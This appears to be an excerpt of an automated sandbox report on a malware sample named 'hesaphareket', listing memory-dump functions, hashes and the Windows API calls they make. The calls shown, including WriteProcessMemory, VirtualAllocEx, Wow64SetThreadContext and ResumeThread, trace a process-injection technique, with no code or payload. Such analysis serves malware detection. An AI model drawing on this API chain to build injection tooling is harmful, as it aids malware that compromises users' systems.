                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: b78e2fc453fbdc83945b1ed5e921ea82dad2f2cfc24762b1efe10a77980bdf4d
                                                    • Instruction ID: bec39234728e6d2b5409fc186b29657a2e1c6aca086a92025f3f0ec52c57c957
                                                    • Opcode Fuzzy Hash: b78e2fc453fbdc83945b1ed5e921ea82dad2f2cfc24762b1efe10a77980bdf4d
                                                    • Instruction Fuzzy Hash: 0E2124B1D003099FCB50DFAAC985BDEBBF5FF48310F10842AE919A7240D7789944CBA0
                                                    Function 06D5746A Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D574EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 1302341f89a78a410c7340bca6a9b1026dab0c0daa9294a45aadae181dc1b03b
                                                    • Instruction ID: 6adff29191fb4a2384d628e74e6025bdaf6c614747e2d26caa83e07cf19615a7
                                                    • Opcode Fuzzy Hash: 1302341f89a78a410c7340bca6a9b1026dab0c0daa9294a45aadae181dc1b03b
                                                    • Instruction Fuzzy Hash: 79216AB1D002098FDB10DFAAC4857EEBBF4EF48314F108429D419A7740C778A945CFA0
                                                    Function 06D57B28 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06D57BB0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: c205e1aa600a574ea53d431f4b42f02bbeadfaa542f843a2c5a6e2c43dd01ee7
                                                    • Instruction ID: 97c0fd08766e0a1cc57479804b24399731f8f15a080ede0719aa2f7407458c3c
                                                    • Opcode Fuzzy Hash: c205e1aa600a574ea53d431f4b42f02bbeadfaa542f843a2c5a6e2c43dd01ee7
                                                    • Instruction Fuzzy Hash: 9E2136B1C002499FCF10DFAAC881AEEBBF5FF48310F50842AE919A3240C7349944CBA0
                                                    Function 00B5D5E8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5D677
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 67a73ee28d209a4a6e7ffab46def834df0f679744ad80c5318f2dd861b307ceb
                                                    • Instruction ID: b1169b55340434932cc2c87fa855148dd3bf52eac9969ea465058b0d80f8f793
                                                    • Opcode Fuzzy Hash: 67a73ee28d209a4a6e7ffab46def834df0f679744ad80c5318f2dd861b307ceb
                                                    • Instruction Fuzzy Hash: 7A21F5B5D00209DFDB10CFAAE584ADEBBF5FB48310F14815AE919A3350D378A945CFA4
                                                    Function 06D57470 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D574EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: b6ab517a4dadc241ac770a0e200aa287f52171542f8779ffaf83af1c4e13a3fd
                                                    • Instruction ID: c13629d6c0d798d4d05c461f083778f5a63c22121a181ce5c686c0f4752670ff
                                                    • Opcode Fuzzy Hash: b6ab517a4dadc241ac770a0e200aa287f52171542f8779ffaf83af1c4e13a3fd
                                                    • Instruction Fuzzy Hash: E42147B1D003098FDB50DFAAC4857EEBBF4EF88324F10842AD819A7240D778A945CFA0
                                                    Function 06D57B30 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06D57BB0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: e4493284667f809117b92a40350758229b8565c2c90f43f2af4e44f8ea4f5707
                                                    • Instruction ID: 0fce2effda429fb7dd957c46baf9edda6a8a2bd209ce24e2cd6b4ee83af930e5
                                                    • Opcode Fuzzy Hash: e4493284667f809117b92a40350758229b8565c2c90f43f2af4e44f8ea4f5707
                                                    • Instruction Fuzzy Hash: 622125B1C002499FCB10DFAAC881AEEFBF5FF48310F50842AE959A7240D7799944CBA0
                                                    Function 00B5D5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5D677
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 65fc9ced5a214955c5c44a5ce283551761675bf35a9dca2f1f327389d0962dba
                                                    • Instruction ID: 62d5f51367fa5357d98d54caaf62707a09d6e7ae50ac559e551f4757ec381c5e
                                                    • Opcode Fuzzy Hash: 65fc9ced5a214955c5c44a5ce283551761675bf35a9dca2f1f327389d0962dba
                                                    • Instruction Fuzzy Hash: 9821C2B5900249AFDB10CFAAD984ADEBBF9FB48310F14855AE918A3350D374A944CFA5
                                                    Function 06D57542 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06D575B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 4d2d1be03736daf5174c4256486dae64671e7554a1e51764f0f0aef9f14ea5a0
                                                    • Instruction ID: 9b47e2c9db472e1e3b2b26b89cf7ccb0195db13f8f27b2da2fdea40b569a34e2
                                                    • Opcode Fuzzy Hash: 4d2d1be03736daf5174c4256486dae64671e7554a1e51764f0f0aef9f14ea5a0
                                                    • Instruction Fuzzy Hash: 391167B18002099FCB10DFAAC845BEFBFF5EF88320F24841AE519A7650C775A944CFA0
                                                    Function 06D57548 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06D575B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 6109929bc7a10a62d26588c89f4b9fb5b2704c029f329f9afb19021c524e9fc3
                                                    • Instruction ID: eedfb7df8044e6fd787f66e132e31f8b1774257ee137e53d2ef8bb9b9f7dc783
                                                    • Opcode Fuzzy Hash: 6109929bc7a10a62d26588c89f4b9fb5b2704c029f329f9afb19021c524e9fc3
                                                    • Instruction Fuzzy Hash: 601137719002499FCB10DFAAC845AEFBFF5EF88320F208419E519A7250C775A944CFA0
                                                    Function 06D573BA Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: e090998c6165b05f754bd54277ba5c4cc7aaa04bf745c21445d145b954229b11
                                                    • Instruction ID: 889ca203c394f22d6f3d3e29b554f1a05db624a56e8d2aa1addccd2f0eb76a3a
                                                    • Opcode Fuzzy Hash: e090998c6165b05f754bd54277ba5c4cc7aaa04bf745c21445d145b954229b11
                                                    • Instruction Fuzzy Hash: FC1128B1D002498FDB24DFAAD8457DEFFF9EB88324F248419D419A7640C775A945CBA0
                                                    Function 06D573C0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: b8fa24ca0c744ed84593afe21692cd7e3f5f0d9fcad9b4ec4d8c6701ba2f7a21
                                                    • Instruction ID: 897828658a307b2e7228f2f1d81f93377d6d7e1e6b9580ce53108a27cb26f426
                                                    • Opcode Fuzzy Hash: b8fa24ca0c744ed84593afe21692cd7e3f5f0d9fcad9b4ec4d8c6701ba2f7a21
                                                    • Instruction Fuzzy Hash: D21136B1D002498FCB24DFAAD8457DEFFF9EF88324F20841AD419A7640C775A944CBA0
                                                    Function 00B5AEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00B5AF5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 5fd8b6a38f20e7f5b06b49e3a43e19709aa6bacf733f3855225c688518aeabf3
                                                    • Instruction ID: a67db515032a011963bb8b4e56849ce732f2d79e7645a65ad534d5dfdba37816
                                                    • Opcode Fuzzy Hash: 5fd8b6a38f20e7f5b06b49e3a43e19709aa6bacf733f3855225c688518aeabf3
                                                    • Instruction Fuzzy Hash: A011DFB6C003498FCB10DF9AD444B9EFBF5EB88314F1085AAD819B7610D379A549CFA1
                                                    Function 06D5A660 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D5A6C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 5a18c740a37c1e47dee597ac9cc5b9924b208f0234c2596672dd7933ec7b31ff
                                                    • Instruction ID: b48fd4d7ee536732410e53d98328b01615d989d4c0d4a157fab80135e8644b00
                                                    • Opcode Fuzzy Hash: 5a18c740a37c1e47dee597ac9cc5b9924b208f0234c2596672dd7933ec7b31ff
                                                    • Instruction Fuzzy Hash: AA11F2B58003499FDB10DF9AD885BDEBBF8EB48314F148419E918B3610C375A944CFA1
                                                    Function 06D545AC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D5A6C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 33d9600a3f0e4b58da97b2d13dd035e4261385c8f1ff84ee1ac3670632fd2156
                                                    • Instruction ID: db4dd70b9c8fa57957a042e1048ddd7c3e58af1a6acfce88f9a8482b1e224659
                                                    • Opcode Fuzzy Hash: 33d9600a3f0e4b58da97b2d13dd035e4261385c8f1ff84ee1ac3670632fd2156
                                                    • Instruction Fuzzy Hash: BA1122B58007489FCB50DF9AC884BDEBBF8EB48310F108819E918A3600C375A944CFE5
                                                    Function 00ADD3D8 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331128369.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_add000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c343056d926dfba4848ef75481399c2de1ea97e7f4c23107e9f318572f1cf391
                                                    • Instruction ID: f435335a12169dea22e623a80ea43b1aeaf3ba85cfe05099f95834ba1b058e63
                                                    • Opcode Fuzzy Hash: c343056d926dfba4848ef75481399c2de1ea97e7f4c23107e9f318572f1cf391
                                                    • Instruction Fuzzy Hash: 9D2125B5504204EFDB05DF14D9C0B26BF75FB98324F20C56AE90A0B35AC336E856CAA2
                                                    Function 00AED01C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331196205.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_aed000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a26249c80f56f07671ff3117640f20052a52f817d9fede184631219634d92e0
                                                    • Instruction ID: 561b03964f36a71b447b73d647e2868229eefca9803786ba3e9cf453738182e8
                                                    • Opcode Fuzzy Hash: 0a26249c80f56f07671ff3117640f20052a52f817d9fede184631219634d92e0
                                                    • Instruction Fuzzy Hash: 6D210475604284DFCB14DF15D9C4B26BF65FB88314F28C56DE80A4B296C33BD807CA61
                                                    Function 00AED1D4 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331196205.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_aed000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c01013293c6d7f339bce5a4a9952e51385e448f3dd811e87b4d87cc24be03930
                                                    • Instruction ID: 90a0d1e0df6edadf3eaa475eec3c93af80c59e4864ec1a60962fcf8c9cc50bc5
                                                    • Opcode Fuzzy Hash: c01013293c6d7f339bce5a4a9952e51385e448f3dd811e87b4d87cc24be03930
                                                    • Instruction Fuzzy Hash: B22126B5504284EFDB05DF15D9C0B66BBB5FB88314F20C6ADEA094F296C336D806CA61
                                                    Function 00AED006 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331196205.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_aed000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 344bb1c069d0a56133defb96e4dda637f1b3ad22cc97f6e7837f07671242af27
                                                    • Instruction ID: 328f3f3bbde9fe27fd5d3c40c7bdbb90569c454983bc491a1079e14c02406454
                                                    • Opcode Fuzzy Hash: 344bb1c069d0a56133defb96e4dda637f1b3ad22cc97f6e7837f07671242af27
                                                    • Instruction Fuzzy Hash: 37215E755093C08FDB12CF24D994715BF71EB46314F29C5EAD8498B6A7C33A980ACB62
                                                    Function 00ADD3D3 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331128369.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_add000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                    • Instruction ID: 5acedc1d1db2a87a82a311691717290a02df1d54cf18349f655e245b051357a7
                                                    • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                    • Instruction Fuzzy Hash: 3C11D3B6504240DFDB16CF14D5C4B16BF71FB94324F24C6AAD90A0B756C33AE85ACBA1
                                                    Function 00AED1CF Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331196205.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_aed000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                    • Instruction ID: 97de89235289b5bff773b028a563b651e902a19b76f801bc23282dc0c8952679
                                                    • Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
                                                    • Instruction Fuzzy Hash: 5711DD75504280DFCB02CF10C5C4B15FBB1FB84314F24C6ADD9494B296C33AD80ACB61
                                                    Function 00ADD759 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331128369.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_add000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16e68d2b62605bf018254b48b441fb2333831773723bb7f3daadc2f8490b4125
                                                    • Instruction ID: 4dbaf141f015b56d8d68514a0cf2fca28428d8a0c3872770d1a30ad4cc6752e6
                                                    • Opcode Fuzzy Hash: 16e68d2b62605bf018254b48b441fb2333831773723bb7f3daadc2f8490b4125
                                                    • Instruction Fuzzy Hash: EF01A7710043449AD7208B1ADD84B66BFA8EF55320F18C8ABED0A5A38AC3799844C671
                                                    Function 00ADD758 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331128369.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_add000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 20dbd1af3ccd7218ded3ece404b7c6e715d9f482fe7cb99267f2356b6c41213f
                                                    • Instruction ID: 06a8ffe195f812a9d83d81373cb42d832caeb47fe46ab40eb6066ecff37c4e4c
                                                    • Opcode Fuzzy Hash: 20dbd1af3ccd7218ded3ece404b7c6e715d9f482fe7cb99267f2356b6c41213f
                                                    • Instruction Fuzzy Hash: 05F06271404344AEE7208B1ADC88B62FFA8EF55724F18C49AED495A78AC3799844CAB1

                                                    Non-executed Functions

                                                    Function 06D576F8 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aaa4a97cd002e0a818eaf80471f298636f89b2808d251b3fca324e2aefc573d7
                                                    • Instruction ID: ccd58a299a0cf52a734b3798d0264a08ba041aacff9e1fd799e383726949be85
                                                    • Opcode Fuzzy Hash: aaa4a97cd002e0a818eaf80471f298636f89b2808d251b3fca324e2aefc573d7
                                                    • Instruction Fuzzy Hash: 7EE1E874E101198FDB14DFA9C5909AEFBF2FF89304F248169D814AB755DB30A982CFA1
                                                    Function 06D54FE8 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6592ee4fa731aeeadc65ad3902dad723c82d954e16dc298716afe826b7fb99c9
                                                    • Instruction ID: 07d4201de5a1c00d73c94e4b80492d7fcf6d39b9efc1bdeace2f1ca363460a4c
                                                    • Opcode Fuzzy Hash: 6592ee4fa731aeeadc65ad3902dad723c82d954e16dc298716afe826b7fb99c9
                                                    • Instruction Fuzzy Hash: 34E10A74E101198FDB14DFA9D5809AEFBF2FF89304F248169D814AB765DB30A942CFA1
                                                    Function 06D55420 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 65e6ca3a345170b18ca85bed0adf139c71c56b8e64fcb03afa9948b8f0bc51f4
                                                    • Instruction ID: 1913a8a866a3f737678d3b2ec3782ddf3c89fca3ee1294039322457a910d042c
                                                    • Opcode Fuzzy Hash: 65e6ca3a345170b18ca85bed0adf139c71c56b8e64fcb03afa9948b8f0bc51f4
                                                    • Instruction Fuzzy Hash: 40E11A74E112198FCB14DFA9D5809AEFBF2FF89304F248169D814AB755D730A942CFA1
                                                    Function 06D56B48 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3dba050ca68477be12700df874557bca361d81656723ada9625483a971655004
                                                    • Instruction ID: 9b6a00aad80efbffa8bae5f1b1ada3f1d73a741feb5df91ffa5c28192e382cc1
                                                    • Opcode Fuzzy Hash: 3dba050ca68477be12700df874557bca361d81656723ada9625483a971655004
                                                    • Instruction Fuzzy Hash: 2FE1F974E111598FCB14DFA9C5809AEFBF2FF89304F248169D814AB765DB30A942CFA1
                                                    Function 06D55858 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3c686a7ecd020c45b9fc3fdb3c465553491eb63cb99af3a3df273ae3a2afca3c
                                                    • Instruction ID: a7c762324155c4a4b0960735e5364b2a89f1e337b299acf0cb31278df406e0c2
                                                    • Opcode Fuzzy Hash: 3c686a7ecd020c45b9fc3fdb3c465553491eb63cb99af3a3df273ae3a2afca3c
                                                    • Instruction Fuzzy Hash: 7FE10774E101198FCB14DFA9D5809AEFBF2FF89304F248169D814AB755DB30A982CFA1
                                                    Function 00B5D51C Relevance: .3, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1331372448.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_b50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 157db9274f7dcbc9ba89f57d0d32cd43cb84411644ec1da26c60a0643f41b899
                                                    • Instruction ID: 3abbc25cc099e1037d7b35ffa0100d17647b37c483c0c2662334c5b5a2b72754
                                                    • Opcode Fuzzy Hash: 157db9274f7dcbc9ba89f57d0d32cd43cb84411644ec1da26c60a0643f41b899
                                                    • Instruction Fuzzy Hash: 10A14D32A00606CFCF05DFA4D944AAEB7F2FF85301B1585FAE905AB265DB71D90ACB40
                                                    Function 06D55848 Relevance: .1, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1342012341.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6d50000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 06543127a6ec15ea2d4d4d2a3cb4e51cb8c389856b8cde52722fe7920e38ed46
                                                    • Instruction ID: 2ba2ee24ec06bf7a38cf11c194ebb15f4169baf1598617886b8f5cb8ae10a666
                                                    • Opcode Fuzzy Hash: 06543127a6ec15ea2d4d4d2a3cb4e51cb8c389856b8cde52722fe7920e38ed46
                                                    • Instruction Fuzzy Hash: 8A512C74E102198FDB14DFA9C5805AEFBF2FF89314F248169D418A7715D7349942CFA1

                                                    Execution Graph

                                                    Execution Coverage:8%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:19
                                                    Total number of Limit Nodes:4
                                                    execution_graph 39126 2be0848 39127 2be084e 39126->39127 39128 2be091b 39127->39128 39130 2be134b 39127->39130 39132 2be1356 39130->39132 39131 2be1448 39131->39127 39132->39131 39134 2be7061 39132->39134 39135 2be706b 39134->39135 39136 2be7121 39135->39136 39139 624d278 39135->39139 39144 624d288 39135->39144 39136->39132 39140 624d29d 39139->39140 39141 624d4b2 39140->39141 39142 624d4d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 39140->39142 39143 624d4ca GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 39140->39143 39141->39136 39142->39140 39143->39140 39145 624d29d 39144->39145 39146 624d4b2 39145->39146 39147 624d4d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 39145->39147 39148 624d4ca GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 39145->39148 39146->39136 39147->39145 39148->39145

                                                    Executed Functions

